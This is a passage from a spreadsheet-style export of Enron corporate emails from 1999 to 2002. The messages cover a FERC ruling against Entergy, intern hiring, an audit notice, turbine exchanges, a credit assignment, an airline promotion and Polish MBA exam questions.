"current loads" only--not future growth.)_x000D_
_x000D_
Entergy argued to FERC that it is able to satisfy its generation reserve _x000D_
requirements, while maintaining lower amounts of generating capacity within _x000D_
its control area, only because it can rely on the 2000 MWs at issue to reach _x000D_
neighboring control areas, therefore this is "a legitimate reliability _x000D_
need."  Entergy then claimed that Sec. 28.2 of the pro forma tariff (that _x000D_
requires a transmission provider, on behalf of its Native Load Customers, to _x000D_
designate its network resources in the same manner as any Network Customer) _x000D_
does not apply to a utility's uses of its transmission system to serve _x000D_
bundled retail customers. _x000D_
_x000D_
In a draft order issued today, FERC disagreed with Entergy and found that _x000D_
Entergy reserved virtually all of the firm capacity on four key interfaces, _x000D_
even though it had no off-system network resources.  Instead, Entergy used _x000D_
its firm transmission reservation to purchase power whenever it was _x000D_
economical.  Entergy denied all other firm transmission requests and _x000D_
entertained non-firm transmission requests only when it was unable to make an _x000D_
economic deal for itself.  Even though Entergy is not required to take _x000D_
transmission under its tariff for retail load, it is required to designate _x000D_
network resources and loads.  The off-system resource must be generation _x000D_
owned by the transmission provider or under contract.  _x000D_
_x000D_
Although FERC found that Entergy violated the OATT and normally the _x000D_
transmission should be released, Entergy has now begun to designate network _x000D_
resources (these new procedures are pending at FERC).  Aquila also asked FERC _x000D_
for its financial losses of $281,000, but FERC said it lacked authority to _x000D_
order money damages.  FERC would order refunds of the transmission rate, but _x000D_
Aquila did not allege that it paid for services it did not receive._x000D_
_x000D_
Interestingly, FERC told Aquila that it could bring this matter up in Entergy _x000D_
Power Marketing's currently pending 3 year update of its market-based rates _x000D_
stating that  use of the transmission system on a non-preferential basis is a _x000D_
fundamental condition for market-based rates.  (Entergy argued against this _x000D_
saying that there was no allegation that it had profited.  FERC rejected this _x000D_
argument.)  Dynegy has already protested Entergy's 3 year update stating that _x000D_
Entergy is exercising market power by limiting new generation through poor _x000D_
interconnection procedures and agreements.  Enron filed one sentence support _x000D_
of Dynegy's protest.  I think this is why Entergy recently filed its _x000D_
interconnection agreement and procedures at FERC._x000D_
_x000D_
Comm. Herbert dissented saying that this was a "technically" from several _x000D_
years ago._x000D_
_x000D_
Watch for this type of activity from other providers.</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 08:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Good job.  It's got traction.  Can you call when you get a chance to _x000D_
regroup.  thx, jeff</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 01:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'eric.bass@enron.com', 'lwbthemarine@bigplanet.com', 'jason.bass2@compaq.com'})</t>
  </si>
  <si>
    <t>Dave Kopel on NRO</t>
  </si>
  <si>
    <t>?_x000D_
_x000D_
?http://www.nationalreview.com/kopel/kopel110900.shtml_x000D_
 - Dave Kopel on NRO.url</t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 03:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Hiring of Wharton Tiger Teams members for summer associate_x000D_
 positions in Research</t>
  </si>
  <si>
    <t xml:space="preserve">Celeste,_x000D_
_x000D_
Thanks a lot. Please, let us know whom you are willing to take based on the _x000D_
campus interviews,_x000D_
and I shall absorb the overflow. My experience with the Teams 1 &amp; 3 is that _x000D_
they are outstanding students_x000D_
and we shall be able to offer them a fulfilling summer internship._x000D_
_x000D_
Last year we took 8 summer interns into research and all of them very happy _x000D_
with the program._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Celeste Roberts_x000D_
02/16/2001 10:28 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: Jeffrey A Shankman/HOU/ECT@ECT, Michele Nezi Marvin/Enron _x000D_
Communications@Enron Communications, Kristin Gandy/NA/Enron@Enron, Charlene _x000D_
Jackson/Corp/Enron@ENRON, Jana Giovannini/HOU/ECT@ECT _x000D_
Subject: Hiring of Wharton Tiger Teams members for summer associate positions _x000D_
in Research_x000D_
_x000D_
Vince:_x000D_
_x000D_
Just want to confirm our conversation regarding your interest in the Wharton _x000D_
Tiger Teams 1&amp; 3 and your intent to hire interested members into the summer _x000D_
associate program.  You stated that you could take all members into your _x000D_
research group for the summer.  Kristin Gandy is now in the process of _x000D_
obtaining from either you or members of your department the names of the _x000D_
individuals on teams 1 &amp; 3.  Some of these individuals may have interviewed _x000D_
with us during the campus process.  If they did and were turned down by the _x000D_
team for a summer position, we will not extend offers to those individuals.  _x000D_
Otherwise, if you are willing to take the additional Tiger Team Members into _x000D_
your group based on the experience you and your staff have had in working _x000D_
with these students, then the Associate Program will facilitate those offers._x000D_
_x000D_
At mid summer and the end of the summer, these Wharton MBAs' performance will _x000D_
be evaluated and cross-calibrated with other summer associates to determine _x000D_
whether they receive an offer to join the full-time Associate Program.  _x000D_
Offers will be given to those summer associate who achieve extremely high _x000D_
performance ratings._x000D_
_x000D_
As soon as Kristin receives the names of these individuals and determines _x000D_
which members did not already interview, she will get out both a verbal and _x000D_
offer to them._x000D_
_x000D_
As follow-up, Jana Giovannini, Manager of Staffing in Career Development, _x000D_
will staff those that accept our offer from this Tiger Team list into your _x000D_
group for the summer._x000D_
_x000D_
Should you have any questions or concerns, please feel free to contact me._x000D_
_x000D_
Regards,_x000D_
Celeste Roberts_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 22 Mar 2002 08:38:37 -0800 (PST)</t>
  </si>
  <si>
    <t>Out of Office AutoReply: Updated: Planning for Offsite Tests</t>
  </si>
  <si>
    <t>I will be on vacation March 19-22, returning to the office on March 25.</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 03:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Books to Tractebel</t>
  </si>
  <si>
    <t>James:_x000D_
Just wanted to let you know that we sent out 2 books to Tractebel Power, Inc. _x000D_
today._x000D_
Ben</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 05:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alan.comnes@enron.com', 'marcie.milner@enron.com', 'mary.hain@enron.com', 'sandra.mccubbin@enron.com', 'lysa.akin@enron.com', 'richard.shapiro@enron.com', 'karen.denne@enron.com', 'paul.kaufman@enron.com', 'leslie.lawner@enron.com', 'susan.mara@enron.com', 'peggy.mahoney@enron.com', 'joseph.alamo@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Dec. 7 - SDG&amp;E Press Release</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  _x000D_
---------------------- Forwarded by Mona L Petrochko/NA/Enron on 12/11/2000 _x000D_
01:48 PM ---------------------------_x000D_
_x000D_
_x000D_
bchen@newenergy.com (Bill Chen) on 12/08/2000 12:13:42 PM_x000D_
To: arm@phaser.com, jleslie@luce.com_x000D_
cc:  _x000D_
_x000D_
Subject: Dec. 7 - SDG&amp;E Press Release_x000D_
_x000D_
_x000D_
CRECers,_x000D_
_x000D_
Note attached SDG&amp;E press release calling on Governor Davis to use his_x000D_
emergency powers to remedy the accelerating energy crisis by taking a_x000D_
number of actions, e.g., directing local air districts to temporarily lift_x000D_
emissions limits for in-state power plants so that the plants which have_x000D_
met or exceeded their air-emissions limits can run.  In addition, SDG&amp;E_x000D_
reported it made an emergency filing with FERC requesting an immediate_x000D_
reinstatement of price caps on interstate natural gas pipeline_x000D_
transportation to the CA border._x000D_
_x000D_
Bill_x000D_
_x000D_
_x000D_
_x000D_
 - Sempra PR.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Jul 2001 15:25:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jpulliam@velaw.com'})</t>
  </si>
  <si>
    <t>RE: LONG TIME NO TALK!!!!!</t>
  </si>
  <si>
    <t>Jesssseka!!!!_x000D_
_x000D_
I know, it's been ages since we've chatted.  I will definitely give you a buzz so we can catch real time.  _x000D_
_x000D_
I got Clay's message and thought I'd replied, but obviously I forgot.  I'm actually going out of town next weekend.  Which makes me so sad because it would be great to see everyone again.  Of course, I suppose we'll all be seeing quite a bit of each other with Jen and Caycie's weddings coming up._x000D_
_x000D_
I talk to you soon,_x000D_
_x000D_
Sue_x000D_
_x000D_
Glad to hear things are good...even if they are hectic._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Pulliam, Jessica" &lt;jpulliam@velaw.com&gt;@ENRON [mailto:IMCEANOTES-+22Pulliam+2C+20Jessica+22+20+3Cjpulliam+40velaw+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, July 12, 2001 4:01 PM_x000D_
To:	'sscott5@enron.com'_x000D_
Subject:	LONG TIME NO TALK!!!!!_x000D_
_x000D_
_x000D_
susie q, how are  you??????_x000D_
 _x000D_
i hope that all is  well.  i have been meaning to call you for ages.  how's houston?   how's work--still great, i hope?  how are boys?  ect, etc,  etc???_x000D_
 _x000D_
clay and i are doing  well.  we are half way through our summer of working and being wined and  dined.  we eat a lot!!!  we are living in my parents' garage  apt--needless to say, the summer has been a little crazy!!_x000D_
 _x000D_
i know clay sent you  an email at the beginning of the summer, but i just wanted to remind you that we  are going to the lake (LBJ) next weekend.  i am sure you are super busy,  but i'd love to see you if you get a chance!!  lisa and brad and jen and  matt are coming and eddie is going to come for a little bit on saturday, i  think!!_x000D_
 _x000D_
i will try to call  asap---_x000D_
 _x000D_
much love,  jessica</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 00:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kam.keiser@enron.com', 'russ.severson@enron.com', 'david.baumbach@enron.com', 'john.valdes@enron.com', 'phillip.love@enron.com', 'martha.stevens@enron.com', 'errol.mclaughlin@enron.com', 'darron.giron@enron.com'})</t>
  </si>
  <si>
    <t>Gas Trading Audit Notification</t>
  </si>
  <si>
    <t xml:space="preserve">FYI..........._x000D_
---------------------- Forwarded by Jeffrey C Gossett/HOU/ECT on 05/07/2001 _x000D_
07:49 AM ---------------------------_x000D_
From: Mechelle Atwood/ENRON@enronXgate on 05/04/2001 03:24 PM_x000D_
To: Robert L Hall/ENRON@enronXgate, Jeffrey C Gossett/HOU/ECT@ECT, Bryce _x000D_
Baxter/HOU/ECT@ECT_x000D_
cc: Wes Colwell/ENRON@enronXgate, "john.j.boudreaux@andersen.com" _x000D_
&lt;'john.j.boudreaux@andersen.com'&gt;@SMTP@enronXgate, _x000D_
"kate.e.agnew@us.andersen.com" _x000D_
&lt;'kate.e.agnew@us.andersen.com'&gt;@SMTP@enronXgate, Nicole _x000D_
Mendez/ENRON@enronXgate _x000D_
Subject: Gas Trading Audit Notification_x000D_
_x000D_
_x000D_
The Gas Trading Audit is scheduled to begin May 11, 2001 and is expected to _x000D_
take approximately two to three months to complete.  The audit will be _x000D_
executed by Arthur Andersen and led by Kate Agnew._x000D_
_x000D_
We will schedule an opening meeting with you the week of May 7, 2001 to _x000D_
discuss audit scope and any concerns or suggestions you may have._x000D_
_x000D_
The objective of the audit will be to determine whether procedures and _x000D_
controls exercised over activities are adequate and operating effectively.  _x000D_
_x000D_
Results of the audit will be discussed with you and other appropriate _x000D_
personnel both during the audit and at the audit closing meeting. _x000D_
_x000D_
We will endeavor to conduct this audit in a manner that will minimize _x000D_
interruption of your normal business activities and we look forward to _x000D_
working with you and your personnel. Please call me at x5-4554 if have any _x000D_
questions. _x000D_
_x000D_
_x000D_
Mechelle Atwood_x000D_
Director, Enron Assurance Services_x000D_
Enron Wholesale Services_x000D_
713.345.4554; Location:  EB2383_x000D_
Mechelle.Atwood@enron.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 May 1999 03:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: New Units</t>
  </si>
  <si>
    <t xml:space="preserve">Tracy, thanks for the heads up.  Beginning in January of 2000, provide me _x000D_
with the new and old serial numbers for each unit and a closer exchange date, _x000D_
as things (scheduling, changeout activities etc.) tend to move dates around. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Team San-Juan_x000D_
05/14/99 09:31 AM_x000D_
To: Larry Campbell/ET&amp;S/Enron@Enron, Butch Russell/ET&amp;S/Enron@Enron, Rick _x000D_
Smith/ET&amp;S/Enron@Enron, Rich Jolly/ET&amp;S/Enron, Team _x000D_
San-Juan-LaPlata/ET&amp;S/Enron_x000D_
cc:  _x000D_
_x000D_
Subject: New Units_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
The Bloomfield Station will be exchanging three turbines in 2000. The La _x000D_
Plata Station will be exchanging one unit in 2000._x000D_
_x000D_
Bloomfield_x000D_
#1001 on 03-06-2000_x000D_
#1002 on 03-08-2000_x000D_
#1003 on 03-14-2000_x000D_
_x000D_
La Plata_x000D_
#1 on 06-07-2000_x000D_
_x000D_
These units are like for like exchanges._x000D_
                                                                Tracy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 01:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Wendy:_x000D_
Looks like we sent them a draft EEI Cover Sheet earlier this year.  _x000D_
_x000D_
Genia, Can you e-mail that draft to Wendy?_x000D_
_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	Wendy Conwell/ENRON@enronXgate_x000D_
	05/30/2001 05:02 PM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: Tracy Ngo/ENRON@enronXgate, Edward Sacks/ENRON@enronXgate_x000D_
		 Subject: RE: EPMI/Morgan Consent to assignment_x000D_
_x000D_
Carol,_x000D_
_x000D_
I think we would like to push for an EEI with Morgan.  I will send up a _x000D_
credit worksheet ASAP._x000D_
_x000D_
Wendy_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  St Clair, Carol  _x000D_
Sent: Wednesday, May 30, 2001 4:31 PM_x000D_
To: Conwell, Wendy_x000D_
Subject: RE: EPMI/Morgan Consent to assignment_x000D_
_x000D_
Wendy:_x000D_
Thanks._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Wendy Conwell/ENRON@enronXgate 05/30/2001 04:22 PM 	   To: Carol St _x000D_
Clair/HOU/ECT@ECT  cc: Rhonda L Denton/HOU/ECT@ECT, Tracy _x000D_
Ngo/ENRON@enronXgate, Edward Sacks/ENRON@enronXgate, Paul _x000D_
Radous/ENRON@enronXgate  Subject: RE: EPMI/Morgan Consent to assignment_x000D_
_x000D_
_x000D_
Carol,_x000D_
_x000D_
I read the assignment and reviewed our positions with Morgan and Merchant _x000D_
Energy Group of America ("MEGA").  Credit is fine with the assignment.  _x000D_
However, as a result of _x000D_
MEGA assigning its trades to Morgan, our mark-to-market exposure to Morgan _x000D_
increases by approximately $27.8mm over the next 18 months.  Although we have _x000D_
agreed to post margin to each other in the past, our current Master Energy _x000D_
Purchase and Sale Agreement with Morgan does not have any STATED provisions _x000D_
for margining.  Consequently, we would like to amend the agreement to include _x000D_
collateral thresholds for both Enron and Morgan.  I will discuss this issue _x000D_
with Ed and get back to you._x000D_
_x000D_
Thanks,_x000D_
Wendy  _x000D_
 -----Original Message-----_x000D_
From:  St Clair, Carol  _x000D_
Sent: Tuesday, May 29, 2001 10:08 AM_x000D_
To: Conwell, Wendy_x000D_
Cc: Denton, Rhonda_x000D_
Subject: EPMI/Morgan Consent to assignment_x000D_
_x000D_
Wendy:_x000D_
Have you had a chance to take a look at this and if so, do you have any _x000D_
credit issues with this assignment?_x000D_
_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Dec 2001 18:51:26 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gblair@enron.com'})</t>
  </si>
  <si>
    <t>continental.com Specials for Grace Blair</t>
  </si>
  <si>
    <t xml:space="preserve">continental.com Specials for Grace Blair_x000D_
Wednesday, December 26, 2001_x000D_
****************************************_x000D_
_x000D_
EUROPE FARE SALE_x000D_
_x000D_
Shopping Spree in Milan...History lesson in Rome. Design your own dream vacation now while exciting European destinations are on sale. Hurry, seats are limited for this special online offer._x000D_
_x000D_
Purchase your eTickets now at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*VA_x000D_
_x000D_
_x000D_
TRAVEL UPDATES_x000D_
Be sure to check continental.com at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*XA_x000D_
before leaving for the airport. We're looking forward to welcoming you onboard!_x000D_
_x000D_
****************************************_x000D_
TABLE OF CONTENTS_x000D_
1. This Week's Destinations_x000D_
2. Hilton Hotels &amp; Resorts, Doubletree Hotels &amp; Resorts, &amp; Embassy Suites Hotels Offers_x000D_
3. Westin Hotels &amp; Resorts, Sheraton Hotels &amp; Resorts, Four Points by Sheraton, St. Regis, The Luxury Collection and W Hotels Offers_x000D_
4. Alamo Rent A Car Offers_x000D_
5. National Car Rental Offers_x000D_
_x000D_
****************************************_x000D_
1. THIS WEEK'S DESTINATIONS_x000D_
_x000D_
Depart Saturday, December 29 and return on either Monday, December 31 or Tuesday, January 1, 2002. Please see the Terms and Conditions listed at the end of this e-mail._x000D_
_x000D_
Purchase continental.com Specials online until 11:59pm (CST) Friday at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*YA_x000D_
You can also purchase continental.com Specials for an additional cost of $20 per ticket through our telephone service at 1-800-642-1617._x000D_
_x000D_
_x000D_
**********************************************_x000D_
ROUND-TRIP TRAVEL MAY ORIGINATE IN EITHER CITY_x000D_
**********************************************_x000D_
****Roundtrip BETWEEN CLEVELAND, OH and:_x000D_
_x000D_
$109 - Richmond, VA_x000D_
_x000D_
****Roundtrip BETWEEN HOUSTON, TX and:_x000D_
_x000D_
$109 - Lafayette, LA_x000D_
$109 - Mobile, AL_x000D_
$109 - Shreveport, LA_x000D_
_x000D_
****Roundtrip BETWEEN NEW YORK/NEWARK and:_x000D_
_x000D_
$119 - Greenville/Spartanburg, SC_x000D_
_x000D_
_x000D_
********************************_x000D_
2. CONTINENTAL.COM SPECIALS FROM HILTON HOTELS AND RESORTS, DOUBLETREE_x000D_
HOTELS AND RESORTS, AND EMBASSY SUITES HOTELS_x000D_
_x000D_
The following rates are available December 29 - December 31, 2001 and are priced per night._x000D_
--------------------------------------_x000D_
Cleveland, OH - Hilton Garden Inn Cleveland Airport - $109_x000D_
Cleveland, OH - Hilton Cleveland East/Beachwood, Beachwood, OH - $109_x000D_
Cleveland, OH - Embassy Suites Hotel Cleveland-Downtown - $99_x000D_
_x000D_
Houston, TX - Hilton Houston Westchase and Towers - $65_x000D_
Houston, TX - Hilton Houston Hobby Airport - $79_x000D_
_x000D_
Lafayette, LA - Hilton Lafayette and Towers - $69_x000D_
_x000D_
Newark, NJ - Hilton Pearl River, Pearl River, NY - $85/Night, 12/29-30_x000D_
Newark, NJ - Hilton Parsippany, Parsippany, NJ - $109_x000D_
Newark, NJ - Hilton Fort Lee at the George Washington Bridge, Fort Lee, NJ - $169_x000D_
Newark, NJ - Hilton Rye Town, Rye Brook, NY - $119_x000D_
Newark, NJ - Hilton Woodcliff Lake, Woodcliff Lake, NJ - $99/Night, 12/29 - 30_x000D_
Newark, NJ - Hilton Newark Gateway, Newark, NJ - $169_x000D_
Newark, NJ - Doubletree Club Suites Jersey City, Jersey City, NJ - $129_x000D_
_x000D_
_x000D_
To book this week's special rates for Hilton Family Hotels, visit and book at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*ZA_x000D_
Special rates apply only for the dates listed at each hotel and are subject to availability. Check hilton.com for specific dates at each Hilton Family Hotel. Or call at 1-800-774-1500 and ask for Value Rates. Restrictions apply to these rates._x000D_
_x000D_
_x000D_
****************************************_x000D_
3. CONTINENTAL.COM SPECIALS LAST-MINUTE WEEKEND RATES FROM WESTIN HOTELS &amp; RESORTS, SHERATON HOTELS &amp; RESORTS, FOUR POINTS BY SHERATON, ST. REGIS, THE LUXURY COLLECTION, AND W HOTELS_x000D_
_x000D_
There are no offerings from Westin Hotels &amp; Resorts, Sheraton Hotels &amp; Resorts, Four Points by Sheraton, St. Regis, The Luxury Collection and W Hotels this week._x000D_
_x000D_
_x000D_
********************************_x000D_
4. CONTINENTAL.COM SPECIALS FROM ALAMO RENT A CAR_x000D_
_x000D_
Rates listed below are valid on compact class vehicles at airport locations only. Other car types may be available. Rates are valid for rentals on Saturday, December 29 with returns Monday, December 31 or Tuesday, January 1, 2002._x000D_
-------------------------------_x000D_
$20 a day in:  Cleveland, OH (CLE)_x000D_
$18 a day in:  Houston, TX (IAH)_x000D_
$26 a day in:  Newark, NJ (EWR)_x000D_
_x000D_
To receive continental.com Specials discounted rates, simply make advance reservations and be sure to request ID # 596871 and Rate Code 33. Book your reservation online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*AA_x000D_
or contact Alamo at 1-800 GO ALAMO._x000D_
_x000D_
*If you are traveling to a city or a different date that is not listed, Alamo offers great rates when you book online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*BA_x000D_
For complete details on these offers, please refer to Alamo's terms and conditions below._x000D_
_x000D_
_x000D_
****************************************_x000D_
5. CONTINENTAL.COM SPECIALS FROM NATIONAL CAR RENTAL_x000D_
_x000D_
Rates listed below are valid on intermediate class vehicles at airport locations only. Other car types may be available. Rates are valid for rentals on Saturday, December 29 with returns Monday, December 31 or Tuesday, January 1, 2002._x000D_
------------------------------------------_x000D_
$23 a day in:  Cleveland, OH (CLE)_x000D_
$23 a day in:  Greenville, Spartanburg, SC (GSP)_x000D_
$21 a day in:  Houston, TX (IAH)_x000D_
$29 a day in:  Lafayette, LA (LFT)_x000D_
$21 a day in:  Mobile, AL (MOB)_x000D_
$29 a day in:  Newark, NJ (EWR)_x000D_
$23 a day in:  Richmond, VA (RIC)_x000D_
_x000D_
To receive continental.com Specials discounted rates, simply make your reservations in advance and be sure to request Product Code COOLUS. To make your reservation, contact National at 1-800-CAR-RENT (1-800-227-7368), or book your reservation online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*CA_x000D_
Please enter COOLUS in the Product Rate Code field, and 5037126 in the Contract ID field to ensure you get these rates on these dates._x000D_
_x000D_
* If you are traveling to a city or a different date that is not listed, National offers great rates when you book online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*DA_x000D_
For complete details on these offers, please refer to National's terms and conditions below._x000D_
_x000D_
_x000D_
****************************************_x000D_
CONTINENTAL.COM SPECIALS RULES:_x000D_
Fares include a $37.20 fuel surcharge.  Passenger Facility Charges, up to $18 depending on routing, are not included. Up to $2.75 per segment federal excise tax, as applicable, is not included.  Applicable International and or Canadian taxes and fees up to $108, varying by destination, are not included and may vary slightly depending on currency exchange rate at the time of purchase. For a complete listing of rules please visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*VUA_x000D_
_x000D_
_x000D_
ALAMO RENT A CAR'S TERMS AND CONDITIONS:_x000D_
Taxes (including VLF taxes up to US$1.89 per day in California and GST), other governmentally-authorized or imposed surcharges, license recoupment fees, fuel, additional driver fee, drop charges and optional items (such as CDW Waiver Savers(R) up to US$18.99 a day,) are extra. Renter must meet standard age, driver and credit requirements. Rates higher for drivers under age 25. Concession recoupment fees may add up to 14% to the rental rate at some on-airport locations. Up to 10.75% may be added to the rental rate if you rent at an off-airport location and exit on our shuttle bus. Weekly rates require a 5-day minimum rental or daily rates apply. For weekend rates, the vehicle must be picked up after 9 a.m. on Thursday and returned before midnight on Monday or higher daily rates apply. 24-hour advance reservation required. May not be combined with other discounts. Availability is limited. All vehicles must be returned to the country of origin. Offer not valid in San Jose, CA._x000D_
_x000D_
NATIONAL CAR RENTAL TERMS AND CONDITIONS:_x000D_
Customer must provide Contract ID# at the time of reservation to be eligible for discounts. Offer valid at participating National locations in the US and Canada. Minimum rental age is 25. This offer is not valid with any other special discount or promotion. Standard rental qualifications apply. Subject to availability and blackout dates. Advance reservations required. Geographic driving restrictions may apply._x000D_
_x000D_
_x000D_
---------------------------------------_x000D_
This e-mail message and its contents are copyrighted and are proprietary products of Continental Airlines, Inc. Any unauthorized use, reproduction, or transfer of the message or its content, in any medium, is strictly prohibited._x000D_
_x000D_
****************************************_x000D_
If you need assistance please visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*VVA_x000D_
View our privacy policy at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*VWA_x000D_
_x000D_
This e-mail was sent to: gblair@enron.com_x000D_
_x000D_
TO UNSUBSCRIBE:_x000D_
We hope you will find continental.com Specials a valuable source of information. However, if you prefer not to take advantage of this opportunity, please let us know by visiting the continental.com Specials page on our web site at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*VYA_x000D_
_x000D_
TO SUBSCRIBE:_x000D_
Please visit the continental.com Specials page on our web site at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAY*nIsHpkQLgkhgEJht*z*VXA_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 03:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mba@poczta.wshifm.edu.pl'})</t>
  </si>
  <si>
    <t>Re: Obrona - MBA</t>
  </si>
  <si>
    <t xml:space="preserve">Pani Agato,_x000D_
_x000D_
Wysylam kopie mojego planu podrozy (zalacznik)._x000D_
Prosze potwierdzic te wiadomosc i podac numer Pani telefonu._x000D_
Zadzwonie do Pani z hotelu we wtorek i podam numer pokoju._x000D_
_x000D_
W. Kaminski_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/02/2001=_x000D_
=20_x000D_
10:42 AM ---------------------------_x000D_
_x000D_
_x000D_
VKaminski@aol.com on 04/01/2001 05:13:33 PM_x000D_
To: mba@poczta.wshifm.edu.pl_x000D_
cc: VKaminski@aol.com, vkamins@enron.com=20_x000D_
Subject: Re: Obrona - MBA_x000D_
_x000D_
_x000D_
Pani Agato,=20_x000D_
_x000D_
Dwa punkty:=20_x000D_
_x000D_
1. Pytania=20_x000D_
2. Dodatkowe komplikacje.=20_x000D_
_x000D_
I. Pytania=20_x000D_
_x000D_
Controlling wprzedsiebiorstwie=20_x000D_
_x000D_
_x000D_
1. Prosze przedyskutowac podzial funkcji miedzycontrollingiem i =20_x000D_
rachunkowoscia.=20_x000D_
Czym rozni sie controlling odwewnetrznego i zewnetrznego auditing.=20_x000D_
2. Prosze omowic zalety? oraz wady =01&amp;rachunku kosztow dzialan=018 (ABC). =_x000D_
=20_x000D_
_x000D_
Analiza wskaznikowa=20_x000D_
_x000D_
_x000D_
1. Prosze przedyskutowac ograniczenia analizy wskaznikowej.=20_x000D_
2. Prosze omowic istote analizy piramidalnej. Jakie informacje o stanie =20_x000D_
finansowym przedsiebiorstwa mozna uzyskac stosujac te metode? =20_x000D_
_x000D_
Pezentacja instrumentow analizy finansowej=20_x000D_
_x000D_
1. Prosze omowic metody przewidywania potencjalnego? bankructwa firmy przy =_x000D_
=20_x000D_
zastosowaniu analizy wskaznikiwej.=20_x000D_
2. Prosze przedyskutowac klasyfikacje wskaznikow ekonomicznych =20_x000D_
wykorzystywanych do ocenyprzedsiebiorstwa.=20_x000D_
_x000D_
_x000D_
II. Komplikacje.=20_x000D_
_x000D_
We wtorek, 3 kwietnia rano, wylatuje do Filadelfii. Powinienem dotrzec do =_x000D_
=20_x000D_
hotelu okolo godziny 12 czasu lokalnego, czyli godziny 6:00 wieczorem czasu=_x000D_
 =20_x000D_
polskiego. Roznica czasu w stosunku do Houstonu jest 7 godzin, ?w stosunku=_x000D_
=20_x000D_
do =20_x000D_
wybrzeza wschodniego jest 6 godzin.=20_x000D_
_x000D_
Jutro przesle szczegolowy plan podrozy, ktory bedzie zawierac adres i numer=_x000D_
 =20_x000D_
hotelu. Prosze przeslac mi numer, na ktory moge zadzwonic, by podac numer =_x000D_
=20_x000D_
pokoju, lub zadzwonic z samolotu w przypadku opoznienia lotu.=20_x000D_
_x000D_
_x000D_
W. Kaminski=20_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 01:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.collins@enron.com'})</t>
  </si>
  <si>
    <t>Referral of Virgil Haney</t>
  </si>
  <si>
    <t>Jason,_x000D_
We don't have a valid copy of Virgil's resume in the system.  We really need _x000D_
one.  Please send a copy whether it is in an email or on paper._x000D_
_x000D_
Thank you,_x000D_
_x000D_
James A. Collins_x000D_
Employee Referrals_x000D_
713-853-7290</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 08:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Discoveries of PCB's on Regulator Sites on Southwest Gas</t>
  </si>
  <si>
    <t xml:space="preserve">Larry,_x000D_
_x000D_
Does the Victorville site have any geographic relationship to the delivery _x000D_
